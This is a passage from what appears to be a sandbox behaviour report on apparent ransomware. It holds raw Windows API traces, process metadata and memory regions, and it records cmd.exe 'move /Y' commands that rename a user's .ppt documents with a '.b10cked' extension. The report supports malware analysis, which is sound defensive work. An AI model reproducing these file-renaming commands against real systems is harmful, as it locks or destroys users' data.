_String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.127] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.128] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.128] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.128] _wcsicmp (_String1="UFL3TY~1.PPT", _String2=".") returned 71 [0235.128] _wcsicmp (_String1="UFL3TY~1.PPT", _String2="..") returned 71 [0235.128] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3ty~1.ppt")) returned 0x20 [0235.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.128] SetErrorMode (uMode=0x0) returned 0x0 [0235.128] SetErrorMode (uMode=0x1) returned 0x0 [0235.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", nBufferLength=0x104, lpBuffer=0x1aedb4, lpFilePart=0x1aed9c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", lpFilePart=0x1aed9c*="UFL3TY~1.PPT") returned 0x2f [0235.129] SetErrorMode (uMode=0x0) returned 0x1 [0235.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0235.129] _wcsicmp (_String1="UFL3TY~1.PPT", _String2=".") returned 71 [0235.129] _wcsicmp (_String1="UFL3TY~1.PPT", _String2="..") returned 71 [0235.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3ty~1.ppt")) returned 0x20 [0235.129] SetErrorMode (uMode=0x0) returned 0x0 [0235.129] SetErrorMode (uMode=0x1) returned 0x0 [0235.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", nBufferLength=0x104, lpBuffer=0x1af230, lpFilePart=0x1aefc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", lpFilePart=0x1aefc8*="UFL3TY~1.PPT") returned 0x2f [0235.129] SetErrorMode (uMode=0x0) returned 0x1 [0235.129] SetErrorMode (uMode=0x0) returned 0x0 [0235.129] SetErrorMode (uMode=0x1) returned 0x0 [0235.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1af438, lpFilePart=0x1aefc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", lpFilePart=0x1aefc8*="UFl3tyKJKu.ppt.b10cked") returned 0x39 [0235.129] SetErrorMode (uMode=0x0) returned 0x1 [0235.129] SetLastError (dwErrCode=0x0) [0235.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt.b10cked")) returned 0xffffffff [0235.129] GetLastError () returned 0x2 [0235.129] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x1ae944, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae944) returned 0x300eb0 [0235.130] FindNextFileW (in: hFindFile=0x300eb0, lpFindFileData=0x1ae944 | out: lpFindFileData=0x1ae944) returned 0 [0235.130] GetLastError () returned 0x12 [0235.130] FindClose (in: hFindFile=0x300eb0 | out: hFindFile=0x300eb0) returned 1 [0235.131] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x311c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311c08) returned 0x300eb0 [0235.131] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked", lpFilePart=0x0) returned 0x39 [0235.131] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt", nBufferLength=0x104, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt", lpFilePart=0x0) returned 0x31 [0235.131] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt")) returned 0x20 [0235.131] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\ufl3tykjku.ppt.b10cked"), dwFlags=0x3) returned 1 [0235.132] FindClose (in: hFindFile=0x300eb0 | out: hFindFile=0x300eb0) returned 1 [0235.384] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aeb90 | out: _Buffer=" 1") returned 9 [0235.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.384] GetFileType (hFile=0x7) returned 0x2 [0235.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.384] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aeb1c | out: lpMode=0x1aeb1c) returned 1 [0235.384] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aeb50 | out: lpConsoleScreenBufferInfo=0x1aeb50) returned 1 [0235.384] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.385] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x1aeb90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.385] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aeb74, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x1aeb74*=0x1a) returned 1 [0235.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.385] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.385] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.385] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.385] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.385] SetConsoleInputExeNameW () returned 0x1 [0235.385] GetConsoleOutputCP () returned 0x1b5 [0235.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.386] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.386] exit (_Code=0) Process: id = "638" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e80" os_pid = "0xfa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35088 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35089 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35090 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35091 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35092 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35093 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35094 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35095 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35096 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35097 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35282 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35283 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35284 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35285 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 35286 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 35287 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35288 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35289 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35290 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35291 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35292 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35293 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35294 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35295 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35296 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 35297 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35298 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35299 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35300 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35301 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35302 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35303 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 35304 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 35305 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 878 os_tid = 0xb1c [0234.810] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff5c | out: lpSystemTimeAsFileTime=0x1eff5c*(dwLowDateTime=0xbf6bd1c0, dwHighDateTime=0x1d440a9)) [0234.810] GetCurrentProcessId () returned 0xfa8 [0234.810] GetCurrentThreadId () returned 0xb1c [0234.810] GetTickCount () returned 0x407bd [0234.810] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff54 | out: lpPerformanceCount=0x1eff54*=29159898369) returned 1 [0234.810] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.810] __set_app_type (_Type=0x1) [0234.810] __p__fmode () returned 0x76b331f4 [0234.810] __p__commode () returned 0x76b331fc [0234.810] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.811] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.811] GetCurrentThreadId () returned 0xb1c [0234.811] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb1c) returned 0x38 [0234.811] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.811] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.811] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.811] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.811] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efeec | out: phkResult=0x1efeec*=0x0) returned 0x2 [0234.811] VirtualQuery (in: lpAddress=0x1eff23, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.811] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efebc, dwLength=0x1c | out: lpBuffer=0x1efebc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.811] GetConsoleOutputCP () returned 0x1b5 [0234.811] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.812] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.812] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.812] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.812] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.812] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.812] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.812] GetEnvironmentStringsW () returned 0x290180* [0234.813] FreeEnvironmentStringsW (penv=0x290180) returned 1 [0234.813] GetEnvironmentStringsW () returned 0x290180* [0234.813] FreeEnvironmentStringsW (penv=0x290180) returned 1 [0234.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee5c | out: phkResult=0x1eee5c*=0x40) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0xa8, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x0, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegCloseKey (hKey=0x40) returned 0x0 [0234.813] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee5c | out: phkResult=0x1eee5c*=0x40) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x40, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x1, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x0, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x9, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x4, lpData=0x1eee68*=0x9, lpcbData=0x1eee60*=0x4) returned 0x0 [0234.813] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee64, lpData=0x1eee68, lpcbData=0x1eee60*=0x1000 | out: lpType=0x1eee64*=0x0, lpData=0x1eee68*=0x9, lpcbData=0x1eee60*=0x1000) returned 0x2 [0234.813] RegCloseKey (hKey=0x40) returned 0x0 [0234.814] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.814] srand (_Seed=0x5b8863c2) [0234.814] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"" [0234.814] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"" [0234.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.814] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2918e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.814] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.814] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.814] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.814] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.814] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.814] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.814] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.814] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.814] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.814] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.814] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.814] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.815] GetEnvironmentStringsW () returned 0x2922d0* [0234.815] FreeEnvironmentStringsW (penv=0x2922d0) returned 1 [0234.815] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.815] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.815] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.815] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.815] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.815] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.815] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.815] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.815] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.815] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.815] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.815] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, 